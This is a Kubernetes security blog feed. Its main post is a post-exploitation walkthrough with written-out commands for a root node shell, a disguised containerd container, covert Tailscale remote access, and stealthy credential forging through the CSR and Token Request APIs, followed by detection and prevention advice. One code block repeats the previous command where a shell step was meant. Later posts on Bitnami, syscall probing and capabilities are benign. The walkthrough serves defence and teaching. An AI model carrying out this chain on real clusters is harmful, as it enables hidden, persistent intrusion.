Raesene's Ramblings Things that occur to me https://raesene.github.io/ Beyond the surface - Exploring attacker persistence strategies in Kubernetes <p>I’ve been doing a talk on Kubernetes post-exploitation for a while now and one of requests has been for a blog post to refer back to, which I’m finally getting around to doing now!</p> <p>The goal of this talk is to lay out one attack path that attackers might use to retain and expand their access after an initial compromise of a Kubernetes cluster by getting access to an admin’s credentials. It doesn’t cover all the ways that attackers could do this, but provides one path and also hopefully illuminates some of the inner workings and default settings that attackers might exploit as part of their exploits.</p> <p>There’s a recording of the talk <a href="https://www.youtube.com/watch?v=GtrkIuq5T3M&amp;t=11s">here</a> if you prefer videos, the flow is similar but I have simplified a bit for the latest iteration, thanks to <a href="https://raesene.github.io/blog/2025/05/30/kubernetes-debug-profiles/">debug profiles</a>! The general story the talk tells is one where attackers have temporary access to a cluster admin’s laptop where the admin has stepped away to take a call and not locked it, and they have to see how to get and keep access to the cluster before the admin comes back.</p> <h3 id="initial-access">Initial access</h3> <p>One of the first things an attacker might want to do with credentials is get a root shell on a Kubernetes cluster node as a good spot to look for credentials or plant binaries. With Kubernetes that’s very simple to do as there is functionality built in to the cluster to allow for users with the right levels of access to do that quickly via <code class="language-plaintext highlighter-rouge">kubectl debug</code></p> <p>A typical command might look like this (just replace the node name with one from your cluster)</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl debug node/gke-demo-cluster-default-pool-04a13cdb-5p8d -it --profile=sysadmin --image=busybox </code></pre></div></div> <p>An important point from this command is the <code class="language-plaintext highlighter-rouge">--profile</code> switch as it dictates how much access you’ll have to the node. The <code class="language-plaintext highlighter-rouge">sysadmin</code> profile provides the highest level of access, so is the most useful for attackers.</p> <h3 id="executing-binaries">Executing Binaries</h3> <p>Once the attacker has shell access to a node, their next instinct is likely to download tools to run. This might not be as simple as it could be as many Kubernetes distributions lock down the Node OS, setting filesystems as read-only or <code class="language-plaintext highlighter-rouge">noexec</code>. However, all cluster nodes can do one thing… run containers. So if the attacker can download and run a container on the node, they’re likely to be able to run any programs they like!</p> <p>Doing this we can take a look at some lesser known features of Kubernetes clusters. In a cluster, all containers are run by a container runtime, typically <a href="https://containerd.io/">containerd</a> or <a href="https://cri-o.io/">CRI-O</a>, and it’s possible to talk directly to those programs if you’re on the node, bypassing the Kubernetes APIs altogether.</p> <p>In the talk I start by creating a new containerd namespace using the <code class="language-plaintext highlighter-rouge">ctr</code> tool. Ctr is very useful as it’s always installed (IME) alongside containerd, so you don’t need to get an external client program. We’re creating a containerd namespace to make it a bit harder for someone looking at the host to spot our container. Importantly containerd namespaces have nothing to do with Kubernetes namespaces, or Linux namespaces.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ctr namespace create sys_net_mon </code></pre></div></div> <p>We create a namespace called <code class="language-plaintext highlighter-rouge">sys_net_mon</code> just to make it a bit less obvious than “attackers were here”!. With the namespace created, the next step is to pull down a container image. The one I’m using is <code class="language-plaintext highlighter-rouge">docker.io/sysnetmon/systemd_net_mon:latest</code> . Importantly the contents of this container image have nothing to do with systemd or network monitoring! From a security standpoint it’s an important thing to remember that outside of the official or verified images, Docker Hub does no curation of image contents, so anyone can call their images anything!</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ctr -n sys_net_mon images pull docker.io/sysnetmon/systemd_net_mon:latest </code></pre></div></div> <p>With the image pulled we can use <code class="language-plaintext highlighter-rouge">ctr</code> to start a container</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ctr -n sys_net_mon run --net-host -d --mount type=bind,src=/,dst=/host,options=rbind:ro docker.io/sysnetmon/systemd_net_mon:latest sys_net_mon </code></pre></div></div> <p>This container provides us with full access to the hosts filesystem and also the host’s network interfaces which is pretty useful for post-exploitation activity. After that it’s just a question of getting a shell in the container.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ctr -n sys_net_mon run --net-host -d --mount type=bind,src=/,dst=/host,options=rbind:ro docker.io/sysnetmon/systemd_net_mon:latest sys_net_mon </code></pre></div></div> <h3 id="static-manifests">Static Manifests</h3> <p>Another approach which the attackers could use to run a container on the node is static manifests. Most Kubelets will define a directory on the host which it will load static manifests from. These manifests run a pod without any API server necessary. A handy trick for our attackers is to give their static pod an invalid namespace name, as this prevents it being registered with the API server, so it won’t show up in <code class="language-plaintext highlighter-rouge">kubectl get pods -A</code> or similar. There’s more details on static pods and some of their security oddness on <a href="https://blog.iainsmart.co.uk/posts/2024-10-13-mirror-mirror/">Iain Smart’s blog</a></p> <h3 id="remote-access">Remote Access</h3> <p>The next problem our attackers have to tackle is retaining remote access to the environment after the admin returns to their laptop. Whilst there are a number of remote access programs available, a lot of the security/hacker related ones will be spotted by EDR/XDR style agents, so an alternative can be using something like <a href="https://tailscale.com/">Tailscale</a>!</p> <p>Tailscale has a number of features which are very useful for attackers (in addition to their normal usefulness!). First one is that it can be run with two statically compiled golang binaries that can be renamed. This means that you pick what will show up in the process list of the node. Following the theme of the container image, we use binaries <code class="language-plaintext highlighter-rouge">systemd_net_mon_server</code> and <code class="language-plaintext highlighter-rouge">systemd_net_mon_client</code></p> <p>The first command starts the server</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>systemd_net_mon_server --tun=userspace-networking --socks5-server=localhost:1055 &amp; </code></pre></div></div> <p>and then we start the client</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>systemd_net_mon_client up --ssh --hostname cafebot --auth-key=tskey-auth-XXXXX </code></pre></div></div> <p>In terms of network access this will run on only 443/TCP outbound if it uses Tailscale’s DERP network, so that access will probably be allowed in most environments. Also we can use Tailscale’s ACL feature so that our compromised container can’t communicate with any other machines on our Tailnet.</p> <p><img src="https://raesene.github.io/assets/media/Tailscale-bot-access-control.png" alt="Tailscale ACLs" /></p> <p>With those services running it should be possible to come back into the container over SSH. Tailscale bundles an SSH server with the program, no SSHD will show as running :)</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>tailscale ssh root@cafebot </code></pre></div></div> <h3 id="credentials---kubelet-api">Credentials - Kubelet API</h3> <p>With remote access achieved, our attackers still need long lasting credentials and also it would be nice if they could probe the cluster without touching the Kubernetes API server, as that might show up in audit logs. So to do this they need access to credentials for a user who can talk to the Kubelet API directly. This runs on every node on 10250/TCP and has no auditing option available.</p> <p>In the talk to do this I use <a href="https://github.com/raesene/teisteanas/">teisteanas</a> which creates Kubeconfig based credentials for users using the Certificiate Signing Request (CSR) API. We can create a set of credentials for any user using this approach. For stealth an attacker would likely choose a user which already has rights assigned to it in RBAC, so they don’t have to create any new cluster roles or cluster role bindings. The exact user to use will vary, but in the demos from the talk I use <code class="language-plaintext highlighter-rouge">kube-apiserver</code> which is a user that exists in GKE clusters.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>teisteanas -username kube-apiserver -output-file kubelet-user.config </code></pre></div></div> <p>With that Kubeconfig file in hand and access to the Kubelet port on a host, it’s possible to take actions like listing pods on a node or executing commands in those pods. The easiest way to do this is to use <a href="https://github.com/cyberark/kubeletctl">kubeletctl</a>. So from our container which is running on the node, using the node’s network namespace, we can run something like this</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubeletctl -s 127.0.0.1 -k kubelet-user.config pods </code></pre></div></div> <h3 id="csr-api">CSR API</h3> <p>It’s also important to understand a bit about the CSR API as, for attackers, it’s a useful thing to take advantage of. This API exists in pretty much every Kubernetes distribution and can be used to create credentials that authenticate to the cluster, apart from when using EKS as it does not allow that function. Very importantly credentials created via the CSR API can be abused by anyone who has access to the API server. Most managed Kubernetes distributions have chosen to have the Kubernetes API server exposed to the Internet by default, so an attacker who is able to get credentials for a cluster will be able to use them from anywhere in the world!</p> <p>The CSR API is also attractive to attackers for a number of reasons :-</p> <ul> <li>Unless audit logging is enabled and correctly configured there is no record of the API having been used and the credentials having been created.</li> <li>Credentials created by this API cannot be revoked without rotating the certificate authority for the whole cluster, which is a disruptive operation. The <a href="https://github.com/kubernetes/kubernetes/issues/18982">GitHub issue related to certificate revocation</a> has been open since 2015, so it’s likely this will not change now…</li> <li>It’s possible to create credentials for generic system accounts, so even if the cluster operator has audit logging enabled, it could be difficult to identify malicious activity.</li> <li>The credentials tend to be long lived. Whilst this is distribution dependent, generally this is 1-5 years.</li> </ul> <p>In the demos for the talk we’re running against a GKE cluster, so used the CSR API to generate credentials for the <code class="language-plaintext highlighter-rouge">system:gke-common-webhooks</code> user which has quite wide ranging privileges.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>teisteanas -username system:gke-common-webhooks -output-file webhook.config </code></pre></div></div> <h3 id="token-request-api">Token Request API</h3> <p>Even if the CSR API isn’t available there’s another option built into Kubernetes that can create new credentials, which is the Token Request API. This is used by Kubernetes clusters to create service account tokens, but there’s nothing to stop an administrator who has the correct rights from using it. Similarly to the CSR API there’s no persistent record (apart from audit logs) that new credentials have been created, and they can be hard to revoke if a system level service account has been used, as the only way to revoke the credential is to delete it’s associated service account.</p> <p>The expiry may be less of a problem, depending on the Kubernetes distribution in use, it can vary from 24 hours maximum to one year, from the managed distributions I’ve looked at.</p> <p>In the talk I use <a href="https://github.com/raesene/tocan/">tocan</a> to simplify the process of creating a Kubeconfig file from a service account token.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>tocan -namespace kube-system -service-account clusterrole-aggregation-controller </code></pre></div></div> <p>The service account we clone is an interesting one as it has the “escalate” right, which means it can always become Cluster-admin even if it doesn’t have those rights to begin with. (I’ve written about <a href="https://raesene.github.io/blog/2020/12/12/Escalating_Away/">escalate</a> before)</p> <h3 id="detecting-these-attacks">Detecting these attacks</h3> <p>The talk closes by discussing how to detect and prevent these kind of attacks. For detection there’s a couple of key things to look at</p> <ul> <li><strong>Kubernetes audit logs</strong> - This one is very important. You need to have audit logging enabled with centralized logs and good retention, to spot some of the techniques used here, especially abuse of the CSR and Token Request APIs</li> <li><strong>Node Agents</strong> - Having security agents running on cluster nodes could allow for detection of things like the Tailscale traffic, depending on their configuration</li> <li><strong>Node Logs</strong> - Generally ensuring that logs on nodes are properly centralized and stored is going to be important, as attackers can leave traces there.</li> <li><strong>Know what good looks like</strong> - This one sounds simple but possibly isn’t. If you know what processes should be running on your cluster nodes, you can spot things like “systemd_net_mon” when they show up. What’s tricky here is that every distribution has a different set of management services run by the cloud provider, so it’s not a one off effort knowing what should be there.</li> </ul> <h3 id="preventing-these-attacks">Preventing these attacks</h3> <p>There are a couple of key ways cluster admins can reduce the risk of this scenario happening to them,</p> <ul> <li><strong>Take your clusters off the Internet!!</strong> - Exposing the API server this way means you are one set of lost credentials away from a very bad day. Generally managed Kubernetes distributions will allow you to restrict access, but it’s not the default.</li> <li><strong>Least Privilege</strong> - In this scenario, the compromised laptop had cluster-admin level privileges, enabling the attackers to move through the cluster easily. If the admin had been using an account with fewer privileges, the attacks might well not have succeeded. Whilst some of the rights used, like node debugging, are probably quite commonly used, others like the CSR API and Token Request API probably shouldn’t be needed in day-to-day administration, so could be restricted.</li> </ul> <p>To quote <a href="https://bsky.app/profile/lookitup.baby">Ian Coldwater</a></p> <p><img src="https://raesene.github.io/assets/media/made-of-stars.png" alt="Made of stars" /></p> <h3 id="conclusion">Conclusion</h3> <p>This talk just looks at one path that attackers could take to retain and expand their access to a cluster which they get access to. There are obviously other possibilities, but this can shed some light on some of the ways that Kubernetes works and how to improve your cluster security!</p> Fri, 12 Sep 2025 10:00:00 +0100 https://raesene.github.io/blog/2025/09/12/beyond-the-surface/ https://raesene.github.io/blog/2025/09/12/beyond-the-surface/ Bitnami Deprecation <p><strong>Update</strong> Looks like Bitnami decided to take some more time over this <a href="https://community.broadcom.com/tanzu/blogs/beltran-rueda-borrego/2025/08/18/how-to-prepare-for-the-bitnami-changes-coming-soon">details here</a> and have some 1-day brown outs before removing the repos on Sept 29.</p> <p>One constant of modern development environments is the ever increasing number of dependencies, and the problems that come when they get disrupted. Next week there could be a serious disruption in the container image ecosystem as a provider of popular images and helm charts changes their availability and tags.</p> <h2 id="whats-happening">What’s Happening?</h2> <p><a href="https://github.com/bitnami/charts/issues/35164">This Github issue</a> has most of the details, but it’s a little hard to work out the exact impact from it. The TL;DR. is that Bitnami are moving from freely available images under the Docker Hub Username <code class="language-plaintext highlighter-rouge">bitnami</code> to a split of commercially maintained images under <code class="language-plaintext highlighter-rouge">bitnamisecure</code> and unmaintained legacy images under <code class="language-plaintext highlighter-rouge">bitnamilegacy</code>.</p> <p>The exact timing is unclear as the issue mentions <code class="language-plaintext highlighter-rouge">gradually move existing ones</code> to the legacy repository, however the impact is going to start in a week’s time starting August 28th 2025, so it’s clear that organizations using these images will need to take action sooner rather than later.</p> <h2 id="so-whats-the-impact">So what’s the impact?</h2> <p>Well if you’re either directly using images from <code class="language-plaintext highlighter-rouge">bitnami</code>, Helm charts that reference those images, or images that are built off those base images, you need to start using different images pretty quickly or you might find deploys or image builds failing.</p> <h2 id="how-big-of-a-problem-is-this">How big of a problem is this?</h2> <p>After reading this, I thought it could be worth looking at how many pulls these images are getting. Luckily Docker Hub provides pull statistics via their API, so by looking at changes over time we can get a reasonable idea of how many people are going to be affected.</p> <p>Looking at pull statistics for popular bitnami images over the course of 6 days we can see that the most popular image <code class="language-plaintext highlighter-rouge">kubectl</code> got 1.86M pulls in that time period, and a large number of images have had over 100K pulls in that time, so it seems like these images are pretty heavily used.</p> <p><img src="https://raesene.github.io/assets/media/bitnami-stats.png" alt="bitnami stats" /></p> <h2 id="conclusion">Conclusion</h2> <p>I’ve long said that, when using container images in production, it’s vitally important that you build and maintain all of your own images, or if you want have some kind of commercial maintenance agreement for them. Relying on freely provided externally managed images is a recipe for problems down the line.</p> <p>For now though, the critical point is that everyone using Bitnami images, needs to go an review all their usage and make a fairly rapid plan to address the risk of them breaking in the near future.</p> Thu, 21 Aug 2025 12:30:00 +0100 https://raesene.github.io/blog/2025/08/21/bitnami-deprecation/ https://raesene.github.io/blog/2025/08/21/bitnami-deprecation/ Am I Still Contained? <p>This exploration started, as many do, with “huh that’s odd”. Specifically I was looking at the output of <a href="https://github.com/genuinetools/amicontained">amicontained</a> around filtered syscalls.</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Seccomp: filtering Blocked Syscalls <span class="o">(</span>54<span class="o">)</span>: MSGRCV SYSLOG SETSID USELIB USTAT SYSFS VHANGUP PIVOT_ROOT _SYSCTL ACCT SETTIMEOFDAY MOUNT UMOUNT2 SWAPON SWAPOFF REBOOT SETHOSTNAME SETDOMAINNAME IOPL IOPERM CREATE_MODULE INIT_MODULE DELETE_MODULE GET_KERNEL_SYMS QUERY_MODULE QUOTACTL NFSSERVCTL GETPMSG PUTPMSG AFS_SYSCALL TUXCALL SECURITY LOOKUP_DCOOKIE CLOCK_SETTIME VSERVER MBIND SET_MEMPOLICY GET_MEMPOLICY KEXEC_LOAD ADD_KEY REQUEST_KEY KEYCTL MIGRATE_PAGES UNSHARE MOVE_PAGES PERF_EVENT_OPEN FANOTIFY_INIT OPEN_BY_HANDLE_AT SETNS KCMP FINIT_MODULE KEXEC_FILE_LOAD BPF USERFAULTFD </code></pre></div></div> <p>Looking at the SYSCALLS that were listed as blocked, I noticed that there wasn’t any mention of IO_URING but I know that Docker <a href="https://github.com/moby/moby/pull/46762">blocks io_uring syscalls in the default profile</a>, so what’s going on?</p> <h2 id="looking-at-the-source-code">Looking at the source code</h2> <p>I decided to take a look at the source code to see what was going on and why it might not be working. In the <a href="https://github.com/genuinetools/amicontained/blob/568b0d35e60cb2bfc228ecade8b0ba62c49a906a/main.go#L187">seccompIter function</a> I found what looks like a relevant point. A for loop that iterates over each syscall one at a time.</p> <div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">for</span> <span class="n">id</span> <span class="o">:=</span> <span class="m">0</span><span class="p">;</span> <span class="n">id</span> <span class="o">&lt;=</span> <span class="n">unix</span><span class="o">.</span><span class="n">SYS_RSEQ</span><span class="p">;</span> <span class="n">id</span><span class="o">++</span> </code></pre></div></div> <p>The end point for the loop was a syscall called <code class="language-plaintext highlighter-rouge">SYS_RSEQ</code> and thanks to a very helpful lookup table <a href="https://filippo.io/linux-syscall-table/">here</a> I could see that that’s syscall <code class="language-plaintext highlighter-rouge">334</code>, and the IO_URING syscalls are 425-427, so we can see why they’re not being flagged, the loop doesn’t go that high!</p> <h2 id="fixing-the-problem">Fixing the problem</h2> <p>Whilst I’m not a professional developer by any stretch of the imagination (&lt;GEEK REFERENCE&gt; I’d liken myself to a rogue with the use magic device skill trying to get a wand of fireballs working by hitting the end of it &lt;/GEEK REFERENCE&gt;), I decided to take a stab at fixing the code to get it to include the IO_URING syscalls (and any other ones with higher numbers).</p> <p>We could just increase the maximum number on the for loop, but that does run into a problem, which is that there’s a weird gap in the syscall numbers between 334 and 424. It appears that this was done to <a href="https://stackoverflow.com/a/63713244/537897">sync up syscall numbers in different processor architectures</a>, so we can just add a section to the code to skip those blank numbers.</p> <p>The next tricky part is, it turns out making syscalls directly can sometimes cause the process to exit or hang. The original code has a number of <a href="https://github.com/genuinetools/amicontained/blob/568b0d35e60cb2bfc228ecade8b0ba62c49a906a/main.go#L190">blocks designed to skip tricky syscalls</a></p> <div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="c">// these cause a hang, so just skip</span> <span class="c">// rt_sigreturn, select, pause, pselect6, ppoll</span> <span class="k">if</span> <span class="n">id</span> <span class="o">==</span> <span class="n">unix</span><span class="o">.</span><span class="n">SYS_RT_SIGRETURN</span> <span class="o">||</span> <span class="n">id</span> <span class="o">==</span> <span class="n">unix</span><span class="o">.</span><span class="n">SYS_SELECT</span> <span class="o">||</span> <span class="n">id</span> <span class="o">==</span> <span class="n">unix</span><span class="o">.</span><span class="n">SYS_PAUSE</span> <span class="o">||</span> <span class="n">id</span> <span class="o">==</span> <span class="n">unix</span><span class="o">.</span><span class="n">SYS_PSELECT6</span> <span class="o">||</span> <span class="n">id</span> <span class="o">==</span> <span class="n">unix</span><span class="o">.</span><span class="n">SYS_PPOLL</span> <span class="p">{</span> <span class="k">continue</span> <span class="p">}</span> </code></pre></div></div> <p>Here the approach ended up being a bit trial and error on what syscalls caused problems. Also an interesting aside is that this shows a limitation of this approach to enumerating syscalls, it’s not possible to get a definitive list as you can’t probe for every possible syscall!</p> <p>With that largely working, it was just a question of extending the really long <a href="https://github.com/genuinetools/amicontained/blob/568b0d35e60cb2bfc228ecade8b0ba62c49a906a/main.go#L243">syscallName</a> function that has a case statement giving names for every syscall. This was also the only part of this that LLMs could help with (they got the main problem wildly wrong), and even here they only got most of it right.</p> <p>After all that it looks like this largely works. As the original repository seems unmaintained, I’ve put a fork <a href="https://github.com/raesene/amicontained">here</a> with the updated code.</p> <h2 id="results">Results</h2> <p>Using the updated code in a Docker container we can see that the number of blocked syscalls has increased from 54 to 68, including the IO_URING ones that started this!</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Blocked Syscalls <span class="o">(</span>68<span class="o">)</span>: SYSLOG SETSID USELIB USTAT SYSFS VHANGUP PIVOT_ROOT _SYSCTL ACCT SETTIMEOFDAY MOUNT UMOUNT2 SWAPON SWAPOFF REBOOT SETHOSTNAME SETDOMAINNAME IOPL IOPERM CREATE_MODULE INIT_MODULE DELETE_MODULE GET_KERNEL_SYMS QUERY_MODULE QUOTACTL NFSSERVCTL GETPMSG PUTPMSG AFS_SYSCALL TUXCALL SECURITY LOOKUP_DCOOKIE CLOCK_SETTIME VSERVER MBIND SET_MEMPOLICY GET_MEMPOLICY KEXEC_LOAD ADD_KEY REQUEST_KEY KEYCTL MIGRATE_PAGES UNSHARE MOVE_PAGES PERF_EVENT_OPEN FANOTIFY_INIT OPEN_BY_HANDLE_AT SETNS KCMP FINIT_MODULE KEXEC_FILE_LOAD BPF USERFAULTFD IO_URING_SETUP IO_URING_ENTER IO_URING_REGISTER OPEN_TREE MOVE_MOUNT FSOPEN FSCONFIG FSMOUNT FSPICK PIDFD_GETFD PROCESS_MADVISE MOUNT_SETATTR QUOTACTL_FD LANDLOCK_RESTRICT_SELF SET_MEMPOLICY_HOME_NODE </code></pre></div></div> <h2 id="conclusion">Conclusion</h2> <p>This one was interesting for a number of reasons. First up was a good reminder that you can’t rely on tools always working the way they used to, as the underlying systems change. The second one was that I learned quite a bit about the limitations of closed box testing of syscalls, and also as a side lesson, the current limitations of LLMs when dealing with relatively obscure lower level tech.</p> Mon, 09 Jun 2025 10:30:00 +0100 https://raesene.github.io/blog/2025/06/09/am-i-still-contained/ https://raesene.github.io/blog/2025/06/09/am-i-still-contained/ Kubernetes Debug Profiles <p>I got a lesson today in the idea that it’s always worth re-visiting things you’ve used in the past to see how they’ve changed, as sometimes there will be cool new features!</p> <p>In my <a href="https://youtu.be/4L8Dg_QSx30?si=hwH6LcwvXGCOVkhg">Kubernetes Post-Exploitation talk</a> I make use of <code class="language-plaintext highlighter-rouge">kubectl debug</code> as a means to get a root shell on a cluster node. It’s a very handy command but <em>I thought</em> it wasn’t possible to use <code class="language-plaintext highlighter-rouge">ctr</code> commands from inside the shell you get with <code class="language-plaintext highlighter-rouge">kubectl debug</code> and that turns out to be outdated information!</p> <h2 id="whats-the-problem">What’s the problem?</h2> <p>If you’ve done much with container pentesting or offensive security, you’ll have come across the idea that access to the Docker socket effectively gives root access to the underlying host via <a href="https://zwischenzugs.com/2015/06/24/the-most-pointless-docker-command-ever/">The most pointless Docker command ever</a>, and this is true even if you just have a container with that file mounted in.</p> <p>However in modern Kubernetes clusters, it’s likely that the underlying container runtime is <a href="https://containerd.io/">containerd</a> and not Docker. What can be surprising is that the containerd socket works very differently than the Docker one. It assumes that the client program and the containerd server are operating on the same host with the same environment.</p> <h2 id="old-kubectl-debug">(old) kubectl debug</h2> <p>This problem shows up when using the “legacy” profile for kubectl debug node (which is the default if you don’t specify one). Some commands, using the <code class="language-plaintext highlighter-rouge">ctr</code> client will work just fine, so things like pulling new images, however when you try to run a new container you’ll get an error like this</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ctr: failed to unmount /tmp/containerd-mount2094132404: operation not permitted: failed to mount /tmp/containerd-mount2094132404: operation not permitted </code></pre></div></div> <h2 id="kubectl-debug-profiles-to-the-rescue">Kubectl debug profiles to the rescue!</h2> <p>Fortunately Kubernetes SIG-CLI have been improving on the initial kubectl debug command by having a set of profiles that you can specify, which provide different sets of rights on the node you’re debugging. The list of available profiles is “legacy”, “general”, “baseline”, “netadmin”, “restricted” or “sysadmin”, with the default being “legacy”.</p> <p>So I decided to try the commands from my demo, but with the <code class="language-plaintext highlighter-rouge">sysadmin</code> profile specified as an option, and it works!</p> <p>This is very handy if you’re a sysadmin who wants to interact with the containerd socket as part of your troubleshooting, or if you’re an attacker who’s got access to a host and wants to hide some tools in a containerd container!</p> <p>There are some details on what each of the profiles sets in terms of security options in this <a href="https://github.com/kubernetes/enhancements/tree/master/keps/sig-cli/1441-kubectl-debug#debugging-profiles">KEP</a></p> <h2 id="conclusion">Conclusion</h2> <p>As ever there’s loads of cool new Kubernetes features that come up all the time. I’ve been doing container security things for 9+ years now and I’m still finding interesting things to look at!</p> Fri, 30 May 2025 17:00:00 +0100 https://raesene.github.io/blog/2025/05/30/kubernetes-debug-profiles/ https://raesene.github.io/blog/2025/05/30/kubernetes-debug-profiles/ Cap or no cap <p>I was looking at a <a href="https://github.com/kubernetes/kubernetes/issues/131336">Kubernetes issue</a> the other day and it led me down a kind of interesting rabbit hole, so I thought it’d be worth sharing as I learned a couple of things.</p> <h2 id="background">Background</h2> <p>The issue is to do with the interaction of <code class="language-plaintext highlighter-rouge">allowPrivilegeEscalation</code> and added capabilities in a Kubernetes workload specification. In the issue the reporter noted that if you add <code class="language-plaintext highlighter-rouge">CAP_SYS_ADMIN</code> to a manifest while setting <code class="language-plaintext highlighter-rouge">allowPrivilegeEscalation: false</code> it blocks the deploy but other capabilities when added do not block.</p> <p><code class="language-plaintext highlighter-rouge">allowPrivilegeEscalation</code> is kind of an interesting flag as it doesn’t really do what the name says. In reality, what it does is set a specific Linux Kernel setting designed to stop a process from getting more privileges than when it started, however the name implies it’s intended to do a more wide ranging set of blocks. My colleague Christophe has a <a href="https://blog.christophetd.fr/stop-worrying-about-allowprivilegeescalation/">detailed post looking at this misunderstanding</a>.</p> <p>However what was specifically interesting to me was, when I tried out a quick manifest to re-create the problem, I wasn’t able to and the pod I created was admitted ok.</p> <p>After a bit of looking I realised that when adding the capability, I’d used the name <code class="language-plaintext highlighter-rouge">SYS_ADMIN</code> instead of <code class="language-plaintext highlighter-rouge">CAP_SYS_ADMIN</code>, and it had worked fine, weird!</p> <h2 id="exploring-whats-going-on">Exploring what’s going on</h2> <p>I decided to put together a couple of quick test cases to understand what’s happening (manifests are <a href="https://github.com/raesene/k8sapecsa">here</a>).</p> <ul> <li><code class="language-plaintext highlighter-rouge">capsysadminpod.yaml</code> - This pod adds <code class="language-plaintext highlighter-rouge">CAP_SYS_ADMIN</code> to the capabilities list</li> <li><code class="language-plaintext highlighter-rouge">sysadminpod.yaml</code> - This pod adds <code class="language-plaintext highlighter-rouge">SYS_ADMIN</code> to the capabilities list</li> <li><code class="language-plaintext highlighter-rouge">dontallowprivesccapsysadminpod.yaml</code> - This has <code class="language-plaintext highlighter-rouge">allowPrivilegeEscalation: false</code> set and adds <code class="language-plaintext highlighter-rouge">CAP_SYS_ADMIN</code> to the capabilities list</li> <li><code class="language-plaintext highlighter-rouge">dontallowprivescsysadminpod.yaml</code> - This has <code class="language-plaintext highlighter-rouge">allowPrivilegeEscalation: false</code> set and adds <code class="language-plaintext highlighter-rouge">SYS_ADMIN</code> to the capabilities list</li> <li><code class="language-plaintext highlighter-rouge">invalidcap.yaml</code> - This pod has an invalid capability (<code class="language-plaintext highlighter-rouge">LOREM</code>) set.</li> </ul> <p>Trying these manifests out in a <a href="https://kind.sigs.k8s.io/">kind</a> cluster (using containerd as CRI) showed a couple of things</p> <ul> <li>Adding <code class="language-plaintext highlighter-rouge">CAP_SYS_ADMIN</code> worked but there was no capability added.</li> <li>Adding <code class="language-plaintext highlighter-rouge">SYS_ADMIN</code> worked and the capability was added.</li> <li>setting <code class="language-plaintext highlighter-rouge">allowPrivilegeEscalation: false</code> and adding <code class="language-plaintext highlighter-rouge">CAP_SYS_ADMIN</code> was blocked</li> <li>setting <code class="language-plaintext highlighter-rouge">allowPrivilegeEscalation: false</code> and adding <code class="language-plaintext highlighter-rouge">SYS_ADMIN</code> was allowed and the capability was added.</li> <li>setting an invalid capability worked ok but no capability was added.</li> </ul> <p>So a couple of lessons from that. Kubernetes does not check what capabilities you add, and no error is generated if you add an invalid one, it just doesn’t do anything. Also there’s a redundant block in Kubernetes at the moment where something that doesn’t do anything is blocked, but something which does do something is allowed ok…</p> <p>Doing some more searching on Github turned up some more history on this. Back in 2021, there was a <a href="https://github.com/kubernetes/kubernetes/pull/105237">PR to try and fix this</a> which didn’t get merged, and there’s another <a href="https://github.com/kubernetes/kubernetes/issues/119568">issue from 2023</a> on it as well.</p> <p>From that one thing that caught my eye was that apparently CRI-O handles this differently than containerd, which I thought was interesting</p> <h2 id="comparing-cri-o---with-iximiuz-labs">Comparing CRI-O - with iximiuz labs</h2> <p>I wanted to test out this difference in behaviour, but unfortunately I don’t have a CRI-O backed cluster available on my test lab. Fortunately, iximiuz labs has an awesome <a href="https://labs.iximiuz.com/playgrounds/k8s-omni">Kubernetes playground</a> where you can specify various combinations of CRI and CNI to test out different scenarios, which is nice!</p> <p>Testing out a cluster there with CRI-O confirmed that things are handled rather differently.</p> <ul> <li>Adding <code class="language-plaintext highlighter-rouge">CAP_SYS_ADMIN</code> worked and the capability was added.</li> <li>Adding <code class="language-plaintext highlighter-rouge">SYS_ADMIN</code> worked and the capability was added.</li> <li>setting <code class="language-plaintext highlighter-rouge">allowPrivilegeEscalation: false</code> and adding <code class="language-plaintext highlighter-rouge">CAP_SYS_ADMIN</code> was blocked</li> <li>setting <code class="language-plaintext highlighter-rouge">allowPrivilegeEscalation: false</code> and adding <code class="language-plaintext highlighter-rouge">SYS_ADMIN</code> was allowed and the capability was added.</li> <li>setting an invalid capability resulted in an error on container creation (CRI-O prepended the capability set with <code class="language-plaintext highlighter-rouge">CAP_</code> and then threw an error stopping pod creation as it was invalid).</li> </ul> <p>So we can see that CRI-O handles things a bit differently, allowing both <code class="language-plaintext highlighter-rouge">SYS_ADMIN</code> and <code class="language-plaintext highlighter-rouge">CAP_SYS_ADMIN</code> to work and erroring out on invalid capabilities!</p> <h2 id="conclusion">Conclusion</h2> <p>Sometimes we can assume that Kubernetes clusters will work the same way, so we can freely move workloads from one to another, regardless of distribution. This case provides an illustration of one way that that assumption might not hold up, and we can see some surprising results!</p> Wed, 23 Apr 2025 11:00:00 +0100 https://raesene.github.io/blog/2025/04/23/cap-or-no-cap/ https://raesene.github.io/blog/2025/04/23/cap-or-no-cap/ CVE-2025-1767 - Another gitrepo issue <p>There’s a new Kubernetes security vulnerability that’s just been disclosed and I thought it was worth taking a look at it, as there’s a couple of interesting aspects to it. <a href="https://github.com/kubernetes/kubernetes/issues/130786">CVE-2025-1767</a> exists in the <code class="language-plaintext highlighter-rouge">gitRepo</code> volume type and can allow users who can create pods with <code class="language-plaintext highlighter-rouge">gitRepo</code> volumes to get access to any other git repository on the node where the pod is deployed. This is the second recent CVE related to <code class="language-plaintext highlighter-rouge">gitRepo</code> volumes, I covered the last one <a 